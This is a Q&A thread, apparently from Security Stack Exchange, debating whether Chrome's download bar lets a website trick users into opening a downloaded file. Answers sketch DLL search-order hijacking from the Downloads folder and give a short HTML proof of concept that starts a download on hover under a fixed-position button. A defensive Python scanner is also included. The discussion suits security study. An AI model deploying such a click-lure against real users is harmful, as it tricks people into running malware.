4

Suppose the user is playing a game like flappy bird that requires constant tapping in the lower left area of the screen (where the downloaded file needs to be clicked).

Then, while the user is playing the game, a file is downloaded by the website and the user clicks on it because the user was playing the game, and opens the file.

It could be an EXE file which could harm the system and infect it with malware.

Other browsers like Firefox have a prompt which stops this but Chrome doesn't and I think it is a security issue.

r3mainer
Suici Doga
  • User error is a security issue, but it is very difficult to prevent, and the sorts of technical controls implemented to prevent other security issues can't really be applied. However, user error is not unique to Chrome. Also, launching the download isn't automatic, and more OSes are requiring additional steps to actually execute unsigned code. – Jesse K Apr 28 '16 at 20:56

3 Answers

4

Yes, it can be a security vulnerability. To exploit it, consider the following scenario.

  1. The attacker somehow convinces the user to visit a website under the attacker's control.
  2. A DLL is automatically downloaded to the Downloads folder.
  3. The user downloads a legit installer/setup/whatever to the Downloads folder.
  4. It is possible that this software is vulnerable to DLL load order hijacking.
  5. When the user starts the legitimate app, basically it will load the malicious DLL inside the Downloads folder instead of the legitimate one.

Fortunately, this is not a very probable scenario, as there are a lot of unknowns/ifs in this attack. Can the attacker guess what other legitimate files the user downloads? Is it possible to hijack the DLLs in this software? Will the malicious DLL be blocked by the Chrome download scan? But if the attacker is lucky, it is even possible to elevate privileges to admin, because installers usually start with admin privileges, and this valid UAC prompt is usually accepted by the users.

The originally proposed scenario is less likely I guess, as people don't usually start unknown executables from the Downloads folder. But some people will do for sure.

user2716262
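The precondition in steps 2 to 5 above (a stray DLL sitting in the same folder as an installer the user is about to run) is something a defender can check for directly. The following Python script is an added example, not code from any answer on this page: it lists DLLs that share a folder with an `.exe` or `.msi` installer, defaulting to the user's Downloads folder. The `SAMPLE_LISTING`, the file names in it and the suffix sets are constructed for illustration.

```python
import sys
from pathlib import Path
from typing import Iterable, List

# Suffixes used by this example (an assumption, not a Windows-defined list).
# Windows searches an application's own directory before the system paths,
# which is why a DLL dropped beside an installer is the hijack risk the
# answer describes.
INSTALLER_SUFFIXES = {".exe", ".msi"}
LIBRARY_SUFFIXES = {".dll"}


def dll_sidecars(filenames: Iterable[str]) -> List[str]:
    """Return the DLL names that sit beside at least one installer.

    Pure function over a list of file names so it can be exercised without
    a real file system; an empty result means no installer/DLL pairing.
    """
    names = list(filenames)
    has_installer = any(Path(n).suffix.lower() in INSTALLER_SUFFIXES for n in names)
    if not has_installer:
        return []
    return sorted(n for n in names if Path(n).suffix.lower() in LIBRARY_SUFFIXES)


def scan_folder(folder: Path) -> List[str]:
    """Apply dll_sidecars to the regular files directly inside `folder`."""
    if not folder.is_dir():
        return []
    return dll_sidecars(p.name for p in folder.iterdir() if p.is_file())


# Constructed sample listing standing in for a real Downloads folder.
SAMPLE_LISTING = [
    "setup-tool-1.2.exe",  # a legitimate installer the user fetched on purpose
    "helper.dll",          # a DLL that arrived through an unnoticed download
    "report.pdf",
    "notes.txt",
]


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.home() / "Downloads"
    found = scan_folder(target)
    if found:
        print(f"{target}: DLLs beside an installer: {', '.join(found)}")
    else:
        print(f"{target}: no DLL sits beside an installer")
    print("sample listing:", dll_sidecars(SAMPLE_LISTING))
```

Run it with no arguments to inspect your own Downloads folder, or pass a directory path. A non-empty result is not proof of an attack, only the pairing the answer warns about; the safe habit it supports is running installers from an empty folder rather than from Downloads.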
2

I'm not sure if this can really be called a vulnerability ... However, this behaviour could possibly be unwanted.

I would imagine a possible exploit like this:

  • User is on a website
  • Make the user click on a button on the left bottom on the screen (fix the position of the button so that it never changes its position on the screen)
  • As soon as the user has the mouse over the button (onMouseOver) start the download of an executable file
  • The Chrome Download bar pops up and the downloaded file is now where the button was
  • If the user presses the mouse button, he might accidentally open the downloaded file instead (if it is already fully downloaded).

It depends on the operating system whether the downloaded file is directly executed or whether it presents another warning to the user.

I have built a short example. This assumes that download.example.com automatically starts a download. And if you are not very fast with clicking, then it works and you have just opened a (maybe malicious) file.

```html
<html>
 <body>
  <!-- Fixed to the lower-left corner, the spot where Chrome's download bar
       shows the finished file; hovering triggers the navigation that starts
       the download on download.example.com -->
  <button type="button"
    onMouseOver="window.location.assign('http://download.example.com/')"
    style="position: fixed; bottom: 1em; left: 1em;">Click Me!</button>
 </body>
</html>
```

[Screenshot: Chrome]

The Firefox browser does prevent such attacks by default by adding a delay on the download button (see the question Is the save button delay in a Firefox download dialog a security feature?).

Lukas
0

This is not a security issue in Chrome. This is more of a mistake a user can make.
In order for your "attack" to work you need the following steps:

  1. Get a user to play your game
  2. Download a file without the user noticing
  3. Get him to click close enough to the bottom download bar
  4. Assume he made a mistake and clicked the downloaded file

The likelihood of this happening either way is very low. If it does happen it is 100% the user's fault and not Chrome's.

Bubble Hacker
  • 3
    Sure, it is not their fault in the way an arbitrary code execution bug would be their fault, but the big browsers aim at making security easy for the low information user. I think the question could be read as "Has Chrome failed in that mission here?" – Anders Apr 28 '16 at 12:28
  • I don't know if I would say that they failed, but it can be a nice extra option to have. Either way this is not a security issue... – Bubble Hacker Apr 28 '16 at 12:36
  • 3
    @BubbleHacker I definitely think this is a security issue. If not, what is it? – Neil Smithline Apr 28 '16 at 17:58